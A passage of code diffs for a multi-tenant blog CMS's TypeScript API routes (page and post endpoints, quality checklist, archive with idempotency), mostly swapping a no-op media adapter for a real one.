+import { noopNewsMediaPortAdapter } from "../../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "pages",
+  action: "read" as const
+};
+
+/**
+ * `GET /api/v1/blog/pages/{id}/quality-checklist` (Issue #640). Read-only
+ * preview for the admin page editor, mirroring `posts/{id}/quality-
+ * checklist.ts` exactly — see that file's header for the full rationale.
+ * `taxonomy_exists` is always reported non-applicable for pages
+ * (`awcms_blog_pages` has no category/tag assignment table, unlike
+ * posts' `awcms_blog_post_terms`). There is currently no
+ * `POST /api/v1/blog/pages/{id}/publish` or `.../schedule` endpoint in this
+ * codebase at all — pages are created directly in `status = 'draft'` with
+ * no lifecycle-transition route (a pre-existing gap, out of this issue's
+ * atomic scope to add). This endpoint is therefore preview-only for pages:
+ * it reports the same checklist a page WOULD need to pass, but nothing
+ * currently blocks a page transition server-side because no such
+ * transition exists to gate.
+ */
+export const GET: APIRoute = async ({ request, params, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const pageId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!pageId) {
+    return fail(400, "VALIDATION_ERROR", "Page id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const page = await fetchBlogPageById(tx, tenantId, pageId);
+
+    if (!page) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog page not found.");
+    }
+
+    const blogSettings = await fetchBlogSettings(tx, tenantId);
+    const checklist = await evaluateContentQualityChecklistForContent(
+      tx,
+      tenantId,
+      "page",
+      page,
+      0,
+      noopNewsMediaPortAdapter,
+      blogSettings.contentQualityChecklistPolicy,
+      {
+        socialPreviewFallback: {
+          tenantFallbackImageMediaId:
+            blogSettings.socialPreviewFallbackImageMediaId,
+          contentImageFallbackEnabled:
+            blogSettings.socialPreviewContentImageFallbackEnabled
+        }
+      }
+    );
+
+    return ok({ pageId, qualityChecklist: checklist });
+  });
+};

--- a/src/pages/api/v1/blog/pages/[id]/quality-checklist.ts
+++ b/src/pages/api/v1/blog/pages/[id]/quality-checklist.ts
@@ -11,7 +11,7 @@ import { hashSessionToken } from "../../../../../../lib/auth/session-token";
 import { fetchBlogPageById } from "../../../../../../modules/blog-content/application/blog-page-directory";
 import { fetchBlogSettings } from "../../../../../../modules/blog-content/application/blog-settings-directory";
 import { evaluateContentQualityChecklistForContent } from "../../../../../../modules/blog-content/application/content-quality-checklist-gate";
-import { noopNewsMediaPortAdapter } from "../../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../../../../modules/news-portal/application/news-media-port-adapter";
 
 const READ_GUARD = {
   moduleKey: "blog_content",
@@ -80,7 +80,7 @@ export const GET: APIRoute = async ({ request, params, cookies }) => {
       "page",
       page,
       0,
-      noopNewsMediaPortAdapter,
+      newsMediaPortAdapter,
       blogSettings.contentQualityChecklistPolicy,
       {
         socialPreviewFallback: {

--- a/src/pages/api/v1/blog/pages/index.ts
+++ b/src/pages/api/v1/blog/pages/index.ts
@@ -1,0 +1,289 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  createBlogPage,
+  listBlogPages
+} from "../../../../../modules/blog-content/application/blog-page-directory";
+import { validateNewsMediaReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/news-media-reference-gate";
+import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/video-news-thumbnail-reference-gate";
+import { noopNewsMediaPortAdapter } from "../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { validateCreateBlogPageInput } from "../../../../../modules/blog-content/domain/blog-page-validation";
+import { validateAndNormalizeContentJsonVideoBlocks } from "../../../../../modules/blog-content/domain/video-news-block-validation";
+import {
+  isBlogContentStatus,
+  type BlogContentStatus
+} from "../../../../../modules/blog-content/domain/post-status";
+import {
+  isPageType,
+  type PageType
+} from "../../../../../modules/blog-content/domain/page-type";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "pages",
+  action: "read" as const
+};
+
+const CREATE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "pages",
+  action: "create" as const
+};
+
+/** `GET /api/v1/blog/pages` (Issue #539) — list this tenant's non-deleted pages, `?status=`/`?pageType=` optional filters, `?limit=` bounded (default 20, max 100). */
+export const GET: APIRoute = async ({ request, cookies, url }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const statusParam = url.searchParams.get("status");
+  let status: BlogContentStatus | undefined;
+
+  if (statusParam !== null) {
+    if (!isBlogContentStatus(statusParam)) {
+      return fail(
+        400,
+        "VALIDATION_ERROR",
+        "status must be one of draft, review, scheduled, published, archived."
+      );
+    }
+
+    status = statusParam;
+  }
+
+  const pageTypeParam = url.searchParams.get("pageType");
+  let pageType: PageType | undefined;
+
+  if (pageTypeParam !== null) {
+    if (!isPageType(pageTypeParam)) {
+      return fail(
+        400,
+        "VALIDATION_ERROR",
+        "pageType must be one of standard, landing, legal, system."
+      );
+    }
+
+    pageType = pageTypeParam;
+  }
+
+  const limitParam = url.searchParams.get("limit");
+  const limit = limitParam ? Number(limitParam) : undefined;
+
+  if (
+    limitParam !== null &&
+    (!Number.isFinite(limit) || (limit as number) < 1)
+  ) {
+    return fail(400, "VALIDATION_ERROR", "limit must be a positive number.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const pages = await listBlogPages(tx, tenantId, {
+      status,
+      pageType,
+      limit
+    });
+
+    return ok({ pages });
+  });
+};
+
+/** `POST /api/v1/blog/pages` (Issue #539) — create a draft page. Not idempotent (same reasoning as `POST /api/v1/blog/posts`) — a retry duplicating a create is caught by the `(tenant_id, locale, slug)` partial unique index. */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request, "large");
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateCreateBlogPageInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Blog page is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+
+  // Issue #639 — unconditional (not R2-only-mode-gated), pure structural
+  // validation/normalization of any `video_news` blocks in `contentJson`:
+  // provider allowlist, videoId format/normalization. Runs before
+  // `withTenant` since it needs no database access.
+  const videoBlockValidation = validateAndNormalizeContentJsonVideoBlocks(
+    input.contentJson
+  );
+
+  if (!videoBlockValidation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Blog page is invalid.",
+      {},
+      videoBlockValidation.errors
+    );
+  }
+
+  input.contentJson = videoBlockValidation.value;
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CREATE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    if (input.parentPageId) {
+      const parentRows = await tx`
+        SELECT id FROM awcms_blog_pages
+        WHERE tenant_id = ${tenantId} AND id = ${input.parentPageId} AND deleted_at IS NULL
+      `;
+
+      if (parentRows.length === 0) {
+        return fail(
+          400,
+          "VALIDATION_ERROR",
+          "parentPageId does not reference an existing page."
+        );
+      }
+    }
+
+    const mediaReferenceValidation =
+      await validateNewsMediaReferencesForFullOnlineR2Mode(
+        tx,
+        tenantId,
+        {
+          featuredMediaId: input.featuredMediaId,
+          contentJson: input.contentJson
+        },
+        noopNewsMediaPortAdapter
+      );
+
+    if (!mediaReferenceValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "One or more image references are not valid R2 media objects in full-online R2-only mode.",
+        {},
+        mediaReferenceValidation.errors
+      );
+    }
+
+    // Issue #639 — mode-gated (same as above): a `video_news` block's
+    // optional `thumbnailMediaObjectId`, when present, must be a verified
+    // same-tenant R2 media object in full-online R2-only mode.
+    const videoThumbnailValidation =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        tx,
+        tenantId,
+        input.contentJson,
+        noopNewsMediaPortAdapter
+      );
+
+    if (!videoThumbnailValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "One or more video thumbnail references are not valid R2 media objects in full-online R2-only mode.",
+        {},
+        videoThumbnailValidation.errors
+      );
+    }
+
+    let page;
+
+    try {
+      page = await createBlogPage(
+        tx,
+        tenantId,
+        auth.context.tenantUserId,
+        input
+      );
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+
+      if (message.includes("awcms_blog_pages_slug_dedup")) {
+        return fail(
+          409,
+          "SLUG_CONFLICT",
+          `A page already exists for slug "${input.slug}" in locale "${input.locale}".`
+        );
+      }
+
+      throw error;
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.page.created",
+      resourceType: "blog_page",
+      resourceId: page.id,
+      severity: "info",
+      message: `Blog page created: ${page.slug}.`,
+      correlationId
+    });
+
+    return ok(page);
+  });
+};

--- a/src/pages/api/v1/blog/pages/index.ts
+++ b/src/pages/api/v1/blog/pages/index.ts
@@ -19,7 +19,7 @@ import {
 } from "../../../../../modules/blog-content/application/blog-page-directory";
 import { validateNewsMediaReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/news-media-reference-gate";
 import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/video-news-thumbnail-reference-gate";
-import { noopNewsMediaPortAdapter } from "../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../../../modules/news-portal/application/news-media-port-adapter";
 import { validateCreateBlogPageInput } from "../../../../../modules/blog-content/domain/blog-page-validation";
 import { validateAndNormalizeContentJsonVideoBlocks } from "../../../../../modules/blog-content/domain/video-news-block-validation";
 import {
@@ -215,7 +215,7 @@ export const POST: APIRoute = async ({ request, cookies, locals }) => {
           featuredMediaId: input.featuredMediaId,
           contentJson: input.contentJson
         },
-        noopNewsMediaPortAdapter
+        newsMediaPortAdapter
       );
 
     if (!mediaReferenceValidation.valid) {
@@ -236,7 +236,7 @@ export const POST: APIRoute = async ({ request, cookies, locals }) => {
         tx,
         tenantId,
         input.contentJson,
-        noopNewsMediaPortAdapter
+        newsMediaPortAdapter
       );
 
     if (!videoThumbnailValidation.valid) {

--- a/src/pages/api/v1/blog/posts/[id].ts
+++ b/src/pages/api/v1/blog/posts/[id].ts
@@ -34,7 +34,7 @@ import {
 import { setPostTranslationGroup } from "../../../../../modules/blog-content/application/localized-content-directory";
 import { validateNewsMediaReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/news-media-reference-gate";
 import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/video-news-thumbnail-reference-gate";
-import { noopNewsMediaPortAdapter } from "../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../../../modules/news-portal/application/news-media-port-adapter";
 import {
   validateSoftDeleteBlogPostInput,
   validateUpdateBlogPostInput
@@ -255,7 +255,7 @@ export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
           seoImageMediaId: input.seoImageMediaId,
           contentJson: input.contentJson
         },
-        noopNewsMediaPortAdapter
+        newsMediaPortAdapter
       );
 
     if (!mediaReferenceValidation.valid) {
@@ -274,7 +274,7 @@ export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
         tx,
         tenantId,
         input.contentJson,
-        noopNewsMediaPortAdapter
+        newsMediaPortAdapter
       );
 
     if (!videoThumbnailValidation.valid) {

--- a/src/pages/api/v1/blog/posts/[id].ts
+++ b/src/pages/api/v1/blog/posts/[id].ts
@@ -1,0 +1,466 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import {
+  fetchGrantedPermissionKeys,
+  resolveModuleEnabled,
+  resolveTenantContext
+} from "../../../../../modules/identity-access/application/auth-context";
+import { recordDecisionLog } from "../../../../../modules/identity-access/application/decision-log";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import { log } from "../../../../../lib/logging/logger";
+import {
+  fetchBlogPostById,
+  softDeleteBlogPost,
+  updateBlogPost
+} from "../../../../../modules/blog-content/application/blog-post-directory";
+import { createBlogRevision } from "../../../../../modules/blog-content/application/blog-revision-directory";
+import {
+  countExistingTerms,
+  fetchPostTermIds,
+  syncPostTermAssignments
+} from "../../../../../modules/blog-content/application/blog-taxonomy-directory";
+import { setPostTranslationGroup } from "../../../../../modules/blog-content/application/localized-content-directory";
+import { validateNewsMediaReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/news-media-reference-gate";
+import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/video-news-thumbnail-reference-gate";
+import { noopNewsMediaPortAdapter } from "../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import {
+  validateSoftDeleteBlogPostInput,
+  validateUpdateBlogPostInput
+} from "../../../../../modules/blog-content/domain/blog-post-validation";
+import { validateAndNormalizeContentJsonVideoBlocks } from "../../../../../modules/blog-content/domain/video-news-block-validation";
+import { evaluatePostUpdateAccess } from "../../../../../modules/blog-content/domain/post-access-policy";
+import { isSignificantContentChange } from "../../../../../modules/blog-content/domain/revision-policy";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "read" as const
+};
+
+const UPDATE_ACTIVITY = { moduleKey: "blog_content", activityCode: "posts" };
+
+const DELETE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "delete" as const
+};
+
+/** `GET /api/v1/blog/posts/{id}` (Issue #538). */
+export const GET: APIRoute = async ({ request, params, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId);
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    const termIds = await fetchPostTermIds(tx, tenantId, postId);
+
+    return ok({ ...post, termIds });
+  });
+};
+
+/**
+ * `PATCH /api/v1/blog/posts/{id}` (Issue #538). Access is decided by
+ * `evaluatePostUpdateAccess` (doc issue #538 §ABAC Rules: an author may
+ * update their own not-yet-published post even without the
+ * `blog_content.posts.update` role permission; a role that holds it may
+ * update any tenant post) — the post is fetched *before* the decision so
+ * `authorTenantUserId`/`status` are real values, same pattern
+ * `workflows/tasks/{id}/decisions.ts` uses for its self-approval check.
+ * Not idempotent (recommended, not required, per doc issue #538
+ * §Idempotency Requirements) — same-body PATCH retries converge to the
+ * same end state.
+ */
+export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request, "large");
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateUpdateBlogPostInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Blog post update is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+
+  // Issue #639 — see `POST /api/v1/blog/posts`'s identical comment. Only
+  // runs when `contentJson` is actually present in this partial update.
+  if (input.contentJson !== undefined) {
+    const videoBlockValidation = validateAndNormalizeContentJsonVideoBlocks(
+      input.contentJson
+    );
+
+    if (!videoBlockValidation.valid) {
+      return fail(
+        400,
+        "VALIDATION_ERROR",
+        "Blog post update is invalid.",
+        {},
+        videoBlockValidation.errors
+      );
+    }
+
+    input.contentJson = videoBlockValidation.value;
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const context = await resolveTenantContext(tx, tenantId, tokenHash, now);
+
+    if (!context) {
+      return fail(401, "AUTH_REQUIRED", "Session is invalid or expired.");
+    }
+
+    const moduleEnabled = await resolveModuleEnabled(
+      tx,
+      tenantId,
+      "blog_content"
+    );
+
+    if (!moduleEnabled) {
+      return fail(
+        403,
+        "MODULE_DISABLED",
+        "Module is disabled for this tenant."
+      );
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId);
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    const grantedPermissionKeys = await fetchGrantedPermissionKeys(
+      tx,
+      tenantId,
+      context.tenantUserId
+    );
+    const decision = evaluatePostUpdateAccess(context, grantedPermissionKeys, {
+      authorTenantUserId: post.authorTenantUserId,
+      status: post.status
+    });
+
+    await recordDecisionLog(
+      tx,
+      tenantId,
+      context.tenantUserId,
+      {
+        ...UPDATE_ACTIVITY,
+        action: "update",
+        resourceType: "blog_post",
+        resourceId: postId
+      },
+      decision
+    );
+
+    if (!decision.allowed) {
+      return fail(403, "ACCESS_DENIED", decision.reason);
+    }
+
+    if (input.termIds && input.termIds.length > 0) {
+      const existingCount = await countExistingTerms(
+        tx,
+        tenantId,
+        input.termIds
+      );
+
+      if (existingCount !== input.termIds.length) {
+        return fail(
+          400,
+          "VALIDATION_ERROR",
+          "termIds contains an id that does not exist for this tenant."
+        );
+      }
+    }
+
+    const mediaReferenceValidation =
+      await validateNewsMediaReferencesForFullOnlineR2Mode(
+        tx,
+        tenantId,
+        {
+          featuredMediaId: input.featuredMediaId,
+          seoImageMediaId: input.seoImageMediaId,
+          contentJson: input.contentJson
+        },
+        noopNewsMediaPortAdapter
+      );
+
+    if (!mediaReferenceValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "One or more image references are not valid R2 media objects in full-online R2-only mode.",
+        {},
+        mediaReferenceValidation.errors
+      );
+    }
+
+    // Issue #639 — see `POST /api/v1/blog/posts`'s identical comment.
+    const videoThumbnailValidation =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        tx,
+        tenantId,
+        input.contentJson,
+        noopNewsMediaPortAdapter
+      );
+
+    if (!videoThumbnailValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "One or more video thumbnail references are not valid R2 media objects in full-online R2-only mode.",
+        {},
+        videoThumbnailValidation.errors
+      );
+    }
+
+    let updated;
+
+    try {
+      updated = await updateBlogPost(tx, tenantId, postId, input);
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+
+      if (message.includes("awcms_blog_posts_slug_dedup")) {
+        return fail(
+          409,
+          "SLUG_CONFLICT",
+          `A post already exists for slug "${input.slug}" in this locale.`
+        );
+      }
+
+      throw error;
+    }
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    if (input.termIds) {
+      await syncPostTermAssignments(tx, tenantId, postId, input.termIds);
+    }
+
+    if (input.translationGroupId !== undefined) {
+      await setPostTranslationGroup(
+        tx,
+        tenantId,
+        postId,
+        input.translationGroupId
+      );
+    }
+
+    const termIds = await fetchPostTermIds(tx, tenantId, postId);
+
+    if (isSignificantContentChange(input)) {
+      await createBlogRevision(
+        tx,
+        tenantId,
+        "post",
+        postId,
+        context.tenantUserId,
+        {
+          title: updated.title,
+          contentJson: updated.contentJson,
+          contentText: updated.contentText,
+          excerpt: updated.excerpt,
+          seoTitle: updated.seoTitle,
+          metaDescription: updated.metaDescription,
+          canonicalUrl: updated.canonicalUrl,
+          status: updated.status
+        },
+        null,
+        correlationId
+      );
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.post.updated",
+      resourceType: "blog_post",
+      resourceId: postId,
+      severity: "info",
+      message: `Blog post updated: ${updated.slug}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.post.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      postId,
+      slug: updated.slug
+    });
+
+    return ok({ ...updated, termIds });
+  });
+};
+
+/** `DELETE /api/v1/blog/posts/{id}` (Issue #538) — soft-delete. `reason` required, same convention as `DELETE /api/v1/profiles/{id}` and `DELETE /api/v1/email/templates/{id}`. */
+export const DELETE: APIRoute = async ({
+  request,
+  params,
+  cookies,
+  locals
+}) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateSoftDeleteBlogPostInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "reason is required.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { reason } = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      DELETE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const deleted = await softDeleteBlogPost(
+      tx,
+      tenantId,
+      auth.context.tenantUserId,
+      postId,
+      reason
+    );
+
+    if (!deleted) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.post.deleted",
+      resourceType: "blog_post",
+      resourceId: postId,
+      severity: "warning",
+      message: "Blog post deleted.",
+      attributes: { reason },
+      correlationId
+    });
+
+    log("info", "blog-content.post.deleted", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      postId
+    });
+
+    return ok({ id: postId, deleted: true });
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/archive.ts
+++ b/src/pages/api/v1/blog/posts/[id]/archive.ts
@@ -1,0 +1,163 @@
+import type { APIRoute } from "astro";
+
+import {
+  fail,
+  jsonResponse,
+  ok
+} from "../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../lib/auth/session-token";
+import { log } from "../../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../../modules/logging/application/audit-log";
+import {
+  computeRequestHash,
+  findIdempotencyRecord,
+  saveIdempotencyRecord
+} from "../../../../../../modules/_shared/idempotency";
+import {
+  fetchBlogPostById,
+  transitionBlogPostStatus
+} from "../../../../../../modules/blog-content/application/blog-post-directory";
+import { isValidStatusTransition } from "../../../../../../modules/blog-content/domain/post-status";
+
+const ARCHIVE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "archive" as const
+};
+
+const IDEMPOTENCY_SCOPE = "blog_post_archive";
+
+/** `POST /api/v1/blog/posts/{id}/archive` (Issue #538). High-risk mutation: requires `Idempotency-Key`. */
+export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const idempotencyKey = request.headers.get("idempotency-key");
+
+  if (!idempotencyKey) {
+    return fail(
+      400,
+      "IDEMPOTENCY_REQUIRED",
+      "Idempotency-Key header is required."
+    );
+  }
+
+  const requestHash = computeRequestHash({ postId, action: "archive" });
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      ARCHIVE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existingIdempotency = await findIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey
+    );
+
+    if (existingIdempotency) {
+      if (existingIdempotency.requestHash !== requestHash) {
+        return fail(
+          409,
+          "IDEMPOTENCY_CONFLICT",
+          "Idempotency-Key was already used with a different request."
+        );
+      }
+
+      return jsonResponse(existingIdempotency.responseBody, {
+        status: existingIdempotency.responseStatus
+      });
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId);
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    if (!isValidStatusTransition(post.status, "archived")) {
+      return fail(
+        409,
+        "INVALID_STATUS_TRANSITION",
+        `Cannot archive a post in status "${post.status}".`
+      );
+    }
+
+    const updated = await transitionBlogPostStatus(
+      tx,
+      tenantId,
+      postId,
+      "archived"
+    );
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.post.archived",
+      resourceType: "blog_post",
+      resourceId: postId,
+      severity: "info",
+      message: `Blog post archived: ${updated.slug}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.post.archived", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      postId,
+      slug: updated.slug
+    });
+
+    const successResponse = ok(updated);
+    const successBody = await successResponse.clone().json();
+
+    await saveIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey,
+      requestHash,
+      200,
+      successBody
+    );
+
+    return successResponse;
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/internal-links/preview.ts
+++ b/src/pages/api/v1/blog/posts/[id]/internal-links/preview.ts
@@ -1,0 +1,113 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
